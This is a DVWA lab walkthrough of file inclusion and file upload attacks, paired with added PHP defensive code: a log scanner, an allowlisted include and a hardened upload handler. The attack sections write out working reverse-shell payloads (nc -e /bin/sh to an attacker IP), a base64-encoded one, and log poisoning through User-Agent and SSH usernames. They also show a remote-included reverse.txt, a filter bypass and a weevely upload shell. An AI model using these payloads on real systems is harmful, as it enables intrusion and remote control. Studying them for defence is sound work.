File Inclusion

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> to get the passwords file (path traversal through the page parameter)

-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION - using environment variables
---------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> to see the environment variables of the running process

Opening the environment variables of the target machine through the inclusion
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ

Now intercept the request using Burp Suite -
change the browser name (the User-Agent header, which shows up in the environment as HTTP_USER_AGENT) to php code in the Burp Suite request header: <?phpinfo()?>

type in command prompt
 --> nc -vv -l -p 8888
type in the Burp Suite header (request)
 --> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION - using logs
  --> /var/log/auth.log
  --> /var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> /var/log/auth.log shows the authentication logs

--> let's try to log in to the server using "ssh" and check the logs

ssh random@192.168.149.136
random
--> a log entry is written (the attempted login, with the user name, lands in auth.log)


ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

the command needs to be converted to base64 --> nc -e /bin/sh attacker_ip 8888
--> open Burp Suite, go to Decoder and paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded output and paste it into the payload: bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4


ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 --> type in command prompt
nc -vv -l -p 8888


--> now open this

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> in the cmd (the listener that received the connection) type
 id
 ls
 pwd
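From the defender's side, both techniques above leave very recognisable traces: traversal sequences and /proc/self/environ or /var/log paths in the access log, a remote scheme in the page parameter, and PHP open tags sitting in a User-Agent or in an sshd "Invalid user" line. The scanner below is an added example, not part of the original post; it reads log lines (Apache access log or auth.log), reports which indicators each line triggers, and can be pointed at a real file from the command line. The sample lines and the IP addresses in them are constructed for this example.

```php
<?php
// Added example, not from the original post: a small scanner for the
// inclusion and log-poisoning indicators shown above. It reads log lines
// (Apache access log or sshd lines from auth.log) and reports which
// indicators each line triggers. The sample lines at the bottom are
// constructed for this example; IP addresses are documentation values.

const INCLUSION_INDICATORS = [
    // "../" plain or URL-encoded anywhere in the request line
    'traversal'      => '~(?:\.\./|\.\.%2f|%2e%2e(?:/|%2f))~i',
    // process environment read through the include
    'proc_environ'   => '~/proc/self/environ~i',
    // classic sensitive-file targets
    'sensitive_file' => '~/etc/(?:passwd|shadow)~i',
    // the log files this page poisons and then includes
    'log_include'    => '~/var/log/(?:auth\.log|apache2/access\.log)~i',
    // remote scheme in the page parameter; the /i flag also catches hTTp://
    'remote_include' => '~[?&]page=(?:https?|ftp)(?:%3a|:)~i',
    // a PHP open tag followed by a call: poisoned User-Agent or SSH user name
    'php_tag'        => '~<\?(?:php)?\s*\w+\s*\(~i',
];

/** Return the list of indicator names matching one log line. */
function classifyLogLine(string $line): array
{
    $hits = [];
    foreach (INCLUSION_INDICATORS as $name => $regex) {
        if (preg_match($regex, $line) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Map 1-based line number => indicator names, only for suspicious lines. */
function scanLogLines(iterable $lines): array
{
    $report = [];
    $n = 0;
    foreach ($lines as $line) {
        $n++;
        $hits = classifyLogLine((string) $line);
        if ($hits !== []) {
            $report[$n] = $hits;
        }
    }
    return $report;
}

// Constructed sample: four access-log lines (combined format) and one sshd line.
$sample = [
    '192.0.2.10 - - [10/Oct/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd HTTP/1.1" 200 2104 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ HTTP/1.1" 200 3320 "-" "<?php phpinfo(); ?>"',
    '192.0.2.10 - - [10/Oct/2024:10:00:15 +0000] "GET /dvwa/vulnerabilities/fi/?page=hTTp://203.0.113.5/reverse.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    'Oct 10 10:00:20 victim sshd[2314]: Invalid user <?php phpinfo(); ?> from 192.0.2.10 port 51234',
];

if (PHP_SAPI === 'cli') {
    $path  = $argv[1] ?? null;                          // optional: scan a real log file instead
    $lines = $path !== null ? new SplFileObject($path) : $sample;
    foreach (scanLogLines($lines) as $lineNo => $hits) {
        printf("line %d: %s\n", $lineNo, implode(', ', $hits));
    }
}
```

Run it with no argument to see the sample classified, or as `php scan.php /var/log/apache2/access.log` against a real file. The first sample line (a normal include of include.php) produces no hits; the others trigger the traversal, sensitive-file, environ, remote-include and PHP-tag indicators respectively. The php_tag pattern is the one worth alerting on: a legitimate client never sends a PHP open tag in a User-Agent or an SSH user name, so a single hit is enough to investigate.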


===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================

It is a special case of file inclusion vulnerabilities. If the server is configured to allow the PHP options allow_url_fopen and
allow_url_include, we will be able to include any file from any computer into the target computer, which amounts to being able to upload any
php file: we can run payloads, reverse shells and system commands as well.
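Every technique on this page (the /proc/self/environ and log includes above, and the remote include described here) relies on the same defect: the request parameter reaches include() unchanged. The following is an added example, not DVWA's own code, showing that pattern beside an allowlisted replacement in which the request value is only ever a key into a fixed map and the mapped file must still resolve inside the page directory. The page names, the ./pages directory and the "page" parameter name are assumptions.

```php
<?php
// Added example, not DVWA's own code: the include pattern that makes every
// technique on this page work, beside an allowlisted version. File names,
// the ./pages directory and the "page" parameter name are assumptions.

// VULNERABLE: whatever arrives in ?page= reaches include() unchanged, so
// ../../etc/passwd, /proc/self/environ, a poisoned /var/log/auth.log or
// (with allow_url_include=On) a remote URL are all valid "pages".
function includeVulnerable(string $page): void
{
    include $page;
}

// HARDENED, step 1: the request value is only ever a key into a fixed map.
const PAGE_ALLOWLIST = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/** Resolve a page key to an absolute path inside $baseDir, or null to reject. */
function resolvePage(?string $page, string $baseDir): ?string
{
    if ($page === null || !array_key_exists($page, PAGE_ALLOWLIST)) {
        return null;                              // unknown key: reject, never guess
    }
    // Step 2: even the mapped name must resolve inside the page directory;
    // this guards against a mistake in the map itself (e.g. a symlink).
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGE_ALLOWLIST[$page]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Include the allowlisted page; returns false (and sends 400) on rejection. */
function includeHardened(?string $page, string $baseDir): bool
{
    $path = resolvePage($page, $baseDir);
    if ($path === null) {
        http_response_code(400);
        return false;
    }
    include $path;
    return true;
}

// Web usage (assumed layout: pages live in ./pages next to this script):
//   includeHardened($_GET['page'] ?? null, __DIR__ . '/pages');

// CLI demo: every inclusion value from this page is rejected by the resolver
// before any filesystem or stream access happens ("home" is only accepted
// if ./pages/home.php really exists).
if (PHP_SAPI === 'cli') {
    $probes = [
        'home',
        '/../../../../../../../etc/passwd',
        '/../../../../../../../proc/self/environ',
        '/../../../../../../../var/log/auth.log',
        'http://203.0.113.5/reverse.txt?',        // documentation IP, not a real host
        'hTTp://203.0.113.5/reverse.txt?',
    ];
    foreach ($probes as $probe) {
        printf("%-45s %s\n", $probe, resolvePage($probe, __DIR__ . '/pages') === null ? 'rejected' : 'allowed');
    }
}
```

The point of the map is that no sanitising of the untrusted string is attempted at all; stripping "../" or "http://" (what DVWA's medium level does) is exactly the kind of filter that case changes and double encodings get around. Keep allow_url_include = Off in php.ini as a second layer, but treat the allowlist as the actual fix.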


In DVWA, remote file inclusion is turned off, so we need to turn it on

sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "On"
ctrl+x
yes
sudo /etc/init.d/apache2 restart


the file should be stored on a real server with an ip that is remotely accessible from the target


<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>

save it as reverse.txt in /var/www/html

open it as http://localhost/reverse.txt   --> it must be reachable remotely if you want to use it against a real server

in cmd type
--> nc -vv -l -p 8080

run this now ...

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


==========================================================================================================
-------------------------- Remote File Inclusion - Medium Security -------------
===========================================================================================================
 nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?
--> medium security only strips a lowercase "http://" from the parameter, so the mixed-case scheme gets through





securing from Remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "Off"
    allow_url_include = Off
ctrl+x
yes
sudo /etc/init.d/apache2 restart






File upload vulnerability:
--------------------------
Generate a web payload and gain a remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php   // the first argument is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg

modify the request using Burp Suite while uploading the file, changing the extension back from jpg to php
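The rename trick works only because the upload handler trusts the client-supplied filename and then stores the file somewhere PHP executes. The handler below is an added example, not from the original post: it decides from the file's bytes (finfo and getimagesize), discards the original name entirely, picks the extension itself and writes into a directory outside the document root. The directory, the form field name and the size limit are assumptions.

```php
<?php
// Added example, not from the original post: server-side checks that stop
// the rename trick above (shell.php uploaded as shell.jpg, or the extension
// edited back to .php in an intercepting proxy). The upload directory, the
// form field name and the size limit are assumptions.

const UPLOAD_DIR    = '/var/www/uploads';     // assumed: outside the document root
const MAX_BYTES     = 2 * 1024 * 1024;
// Accepted types, keyed by the MIME type detected from the file's bytes.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/** Decide from content, never from the client-supplied name or Content-Type. */
function validateImageFile(string $path, int $size): array
{
    if ($size <= 0 || $size > MAX_BYTES) {
        return ['ok' => false, 'reason' => 'bad size'];
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return ['ok' => false, 'reason' => "type $mime not allowed"];
    }
    // A .jpg that is really PHP source fails here. A genuine image carrying
    // PHP in its metadata would pass, which is why the server picks the
    // extension and the upload directory never executes scripts.
    if (@getimagesize($path) === false) {
        return ['ok' => false, 'reason' => 'not a decodable image'];
    }
    return ['ok' => true, 'ext' => ALLOWED_TYPES[$mime]];
}

/** Store one entry of $_FILES; returns the stored name or null on rejection. */
function storeUpload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $check = validateImageFile($file['tmp_name'], (int) $file['size']);
    if (!$check['ok']) {
        return null;
    }
    // The original filename, including its extension, is discarded entirely.
    $name = bin2hex(random_bytes(16)) . '.' . $check['ext'];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Web usage:  $stored = storeUpload($_FILES['picture'] ?? []);
// CLI check of any local file:  php upload_check.php /tmp/shell.jpg
if (PHP_SAPI === 'cli' && isset($argv[1]) && is_file($argv[1])) {
    $result = validateImageFile($argv[1], filesize($argv[1]));
    echo $result['ok'] ? "accepted as .{$result['ext']}\n" : "rejected: {$result['reason']}\n";
}
```

A weevely shell renamed to shell.jpg fails the byte checks outright, and editing the filename in the proxy changes nothing because the name is never used. Serve UPLOAD_DIR with script execution disabled (for mod_php, `php_admin_flag engine off` on that directory, or hand the files out through a small read-only handler), so that even a valid image with PHP appended has nowhere to run.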
